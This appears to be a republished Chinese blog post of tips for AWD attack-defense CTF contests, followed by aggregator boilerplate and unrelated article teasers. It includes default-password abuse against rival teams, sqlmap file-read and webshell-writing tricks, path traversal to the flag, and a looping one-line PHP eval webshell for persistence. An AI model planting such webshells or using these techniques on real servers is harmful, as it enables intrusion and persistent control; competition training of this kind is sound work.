AWD攻防技巧(水文)

这篇具有很好参考价值的文章主要介绍了AWD攻防技巧(水文)。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

1.数据备份

比赛开始第一时间备份,备份网站目录及数据库,一般在 /var/www/html 目录。

一是为了dump下来,用D盾查杀存在的后门;安装sublime全文搜索关键字

二是为了比赛出现异常或恶意破坏进行还原,避免靶机宕机被扣分;

三要审计下有没有高危命令执行函数,进行后期加固,以及有空余时间或专门安排一个人审计下基础漏洞用来做攻击。

命令执行函数 exec()、passthru()、system()、 shell_exec()、popen() 等;代码执行函数:eval()、assert()、preg_repace()、uasort() 等;文件包含函数 include() 、require() 等,用正则匹配 grep -r "@eval" /www/,找到后注释掉。

1.备份源码,注意隐藏文件使用图像化工具连接ssh后,推荐用winscp,准备centos7.9lamp、ubuntu20.04lamp

tar czvf newfile.tar.gz SOURCE  压缩 zxvf

2.备份数据库,   1)本地还原  2)查看后台账号密码 3)查看关闭数据库远程,推荐adminer.php

    mysqldump –u root –p mydatabase > mydatabase_out.sql;

3.恢复备份,在mysql终端下执行:

   命令格式:source FILE_PATH

   source ~/db.sql     

   或者在shell下执行

   shell> mysqldump -h host -u root -p dbname < dbname_backup.sql

2.弱口令

大多数情况下,所有队伍的Web后台、phpmyadmin等服务的管理密码都一样,立马快速检查修改自己密码,并利用此进行攻击。一般默认密码为 admin/admin, admin/123456, test/test,如果被其他队伍改了那就gg了。

3.查找后门

对备份web目录进行后门查杀,脚本获取webshell并快速提交

AWD攻防技巧(水文)

 

 

4.监测攻击payload

tail -f *.log,看日志,不言而喻,抓他们的payload并利用。

5.常见漏洞

常见的漏洞包括SQL注入、文件包含、文件上传、命令执行等。

(1)sql注入漏洞

比赛一般没有防护(除非选手安装了防御脚本),可直接通过 --sql-shell 执行 select load_file(‘/flag’); 得到flag,也可以利用 into outfile 写木马维持权限。

(2)本地文件包含或目录遍历

直接通过 ../../../../../flag 获取。

6.权限维持

(1)不死马

直接linux执行:

while true;do echo '<?php eval($_POST["x"]);?>' > x.php;sleep 1;done

7.防御方法

  1. waf
  2. 文件监控
  3. 克制不死马、内存马

使用条件竞争的方式,不断循环创建和不死马同名的文件和文件夹

8.批量反弹shell

Reverse Shell Manager

AWD攻防技巧(水文)

 

9.批量文件上传

https://github.com/edwardchoijc/ctf-toolkit/tree/master/batch_upload_file文章来源地址https://www.toymoban.com/news/detail-432228.html

到了这里,关于AWD攻防技巧(水文)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 苹果手机怎么备份所有数据?2023年iPhone 15数据备份常用的3种方法!

    当苹果手机需要进行刷机、恢复出厂设置、降级iOS系统等操作时,我们需要将自己的 iPhone数据提前进行备份 。 特别是在苹果发布新iOS系统时,总有一些小伙伴因为升降级系统,而导致了 重要数据的丢失 。 iPhone中储存着重要的照片、通讯录、文件等数据,建议 定期进行数据

    2024年02月07日
    浏览(48)
  • sql数据库怎么备份,sql 实时备份

    在当今互联网时代,数据已经成为企业的核心资产。然而,数据的安全性和完整性面临硬件问题、软件故障、人工操作错误等各种威胁。为了保证数据的安全,实时备份已经成为公司必须采取的重要措施之一。下面我们就重点介绍SQL实时备份的重要实施方法。 SQL实时备份的必

    2024年02月10日
    浏览(58)
  • DigitalOcean 数据备份技术架构升级,并提供每日自动备份功能

    据统计,目前全有超过60%的中小企业数据存储在公有云中。但是,数据量和生成数据的速度都在以惊人的速度增长,这意味着中小企业比以前更需要防范数据中断带来的风险。 备份是每个企业数据保护策略的关键一环。DigitalOcean 备份是由 Droplet (DigitalOcean 的 VPS 产品)磁盘

    2024年03月21日
    浏览(64)
  • iphone备份用什么软件?好用的苹果数据备份工具推荐!

    众所周知,如果要将iPhone的数据跟电脑进行传输备份的话,我们需要用到iTunes这个pc工具。但是对于iTunes,不少人都反映这个软件比较难用,用不习惯。于是,顺应时代命运的iPhone备份同步工具就出现了。那iphone备份用什么软件比较好? 今天小编就给大家介绍一款非常好用又

    2024年02月14日
    浏览(46)
  • MySQL 数据备份和数据恢复

    目录 一、数据备份 1、概述 2、MySQLdump命令备份 1)备份单个数据库中的所有表 2) 备份数据中某个或多个表 3) 备份所有数据库 4)备份多个库 5) 只备份一个表或多个表结构 二、数据恢复 三、数据备份与恢复应用 1、概述 数据备份是数据库管理员非常重要的工作之一。系统意

    2024年02月11日
    浏览(39)
  • ElasticSearch 数据备份参考

    总结: 规模数据建议使用Snapshot and Restore功能,或者用LogStash,小规模数据可以用 elasticdump。 官方建议: 在灾难中,快照可以防止永久数据丢失。快照生命周期管理是对集群进行定期备份的最简单方法。有关详细信息,参阅创建快照。 警告 快照是备份集群的唯一可靠且受支

    2024年02月03日
    浏览(34)
  • Gitlab 数据备份

    1、Gitlab 创建备份 1.1、手动备份 创建备份文件 使用一条命令即可创建完整的Gitlab备份。 gitlab-rake gitlab:backup:create 使用命令会在/var/opt/gitlab/backups目录下创建一个压缩包,这个压缩包就是Gitlab整个的完整部分。 [root@server ~]# gitlab-rake gitlab:backup:create 生成完后,/var/opt/gitlab/bac

    2023年04月21日
    浏览(31)
  • mongo数据备份

    mongo版本:4.4.19 服务器版本:CentOS Linux release 7.9.2009 cd /etc/yum.repos.d/ touch mongodb-org-4.4.repo yum install -y mongodb-org systemctl start mongod 卸载mongo: 在三台机器按上述方法安装mongo: 192.168.91.12:27017 192.168.91.13:27017 192.168.91.14:27017 各个mongo节点修改mongo配置以副本集模式运行: vim /etc/mongod

    2024年02月03日
    浏览(41)
  • Mysql之数据备份

    3.查看通用查询日志是否开启 4.查看二进制日志是否开启 5.查看慢查询日功能是否开启 6.查看慢查询时间设置 7.在数据库中设置开启慢查询的方法 达到事务一致性(每次重启会重做) 确保日志的持久性,防止在发生故障,脏页未写入磁盘。重启数据库会进行redo log执行重做,

    2024年02月09日
    浏览(32)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包